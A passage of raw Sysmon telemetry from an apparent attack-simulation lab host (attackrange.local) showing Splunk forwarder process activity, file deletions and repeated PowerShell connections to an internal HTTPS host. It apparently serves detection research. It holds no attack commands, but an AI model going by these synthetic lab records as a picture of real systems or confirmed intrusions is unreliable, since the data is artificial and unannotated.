Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.922{B81B27B7-4E50-613A-3F90-03000000C801}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:52.072{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56622-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D22F90B029887752F23BD6F7D7A0B4A2,SHA256=16C1D622108FFA951218DAE6D5845F0710E1450A9469FD3D4A81F260E782AB5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.390{B81B27B7-4E50-613A-3E90-03000000C801}68122108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.237{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E50-613A-3E90-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.237{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.237{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.237{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.237{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.237{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E50-613A-3E90-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.237{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E50-613A-3E90-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:28.222{B81B27B7-4E50-613A-3E90-03000000C801}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:29.474{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00D094CDE82F370798140CA99347375C,SHA256=213B08BD31CF588377583D4F6B880622A64A0593894DE75B7AFC8C96EAA493D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:29.271{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01B17C850B8771045BCF25207E1113F4,SHA256=BD31CD9BD48157DB1619E657B0B47EE604BB72FEBF691A1C933A1EB37C615BB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:29.271{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=575C432E1A0216BB72AF2D6E2B9FA080,SHA256=FD2CB15E9D6806B4CB7E97ACC700894C0C27B726DE470667A7D9072C8CC5A7A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:30.488{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F90E1989F4944577C1B5B58ED174E3D0,SHA256=55164A9D8306B7F78A835020EB5B1F92A83F7C164060DAB08C0A8CFF02AC60A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:31.950{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF718025b7.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:56.108{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56623-false10.0.1.12-8000- 23542300x800000000000000035084562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:31.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3608BE9CACB0558D39CD6BF716DBC8D4,SHA256=27F142C3D74DAF635C9CC942E89AB2FCA7A99E12E628BA0C88ABA43831AB50F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:57.086{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56624-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:32.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53F62D47DE74A481027E2281C8C56E2,SHA256=80E309320802BAF49BB8F81D53080051025D04178D61E5D975793E38165847E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:32.072{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4C416AEAE42A00CFFFE3149589D832CC,SHA256=9B28DA3F02DB514ADC90F695E3FCE37C7075BDA6340577CFA25180A69772F402,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:33.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC66095BBEE3DB92C5A747CE7279FD10,SHA256=357B897F7C49D021D218B050979DFB6F446FCDE179ADCB317093070087321BAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:34.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=563811FA45A5AD930231D2BDE08639C1,SHA256=1E33267EE2209D3927F7A0A8C4D67A19E5D1F207EDDC45109656ACFDA0514340,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:35.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E83E31D887C63D2D46458F67799E2490,SHA256=E403B7BEEBBC96196E06EFF78F933634792CBCA9ED4B7581FB910C9B9C439169,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:36.711{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEFE26035301B0CA4D2C61B43CABA5C5,SHA256=384399A75F62EE1E08B55F09872AD9111A79BAA50A2AC0125561D0F9D1204ACC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:36.406{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6C581C3C4875EF2532EA67C23F51117A,SHA256=46A49B021CD6310A21F276662AF20E6294DACC7EDFDAEFF5EA1C5072C4EA7E13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:36.090{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=60FBB634E4173539E0C23766D1AFF311,SHA256=6719FF8211BF272904CE107B9CCDC7B31FEAA3754F93CB1DE4BDA30A641F0C81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:01.189{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56626-false10.0.1.12-8000- 354300x800000000000000035084575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:01.092{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56625-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:37.726{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF923EE2709FC2CF3687EE566CF02071,SHA256=C9BAD7216EC4F7CE9D6BFCBDC7F5EBA3FEC93722C2055F638F23B8FAB51812DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:38.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56FD3C13F520869F6532CB8ED7EC7DD9,SHA256=80B3D7151A5C95BEE29B2D2AF5D373E4B440BF129FAF7AE494C4B36955464B91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:39.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0215305325CC410093A67F9F953FD6DD,SHA256=0EE56A395DE69CFFF359F01CC0C690C1CD35CA7347029226469F32399E45E221,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:40.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1291FBAAAD892350E6C157746B7A3997,SHA256=F1578D0D389AC7B7B4A08ACE43CCF3B31B656E84172E10430C51C07E4791A180,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:41.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=051097F23733AF0468F9080F83409FBB,SHA256=FDE216AD4539BF20A6C9203F4EB088EB51EC940FFB0A8C8920E17003C45ED941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:41.324{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9ED9908D5C8E3E27DEBC9ABCEC7D712,SHA256=E2A7E7D73F4D41A42BA16BEB44A111BF5E56BF33C8BB5221E557702CEFA3E2FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:07.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56628-false10.0.1.12-8000- 354300x800000000000000035084583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:06.095{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56627-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:42.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DAD0EB546D08D0CD1BEF049F0DD3A70,SHA256=8A8942A6816C3F6CB3664BF6B1783EF175AA73E0CDAA704B017A3CE15C42FA00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.875{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF3FB202C8FF4FF60DAF9DA22536BFF,SHA256=601CE2767C5D6AAFBA06E3166A41415DBC9E630E1B6139DBCC0CC4E7AC8E346D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.722{B81B27B7-4E5F-613A-4090-03000000C801}67525864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:43.554{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E5F-613A-4090-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 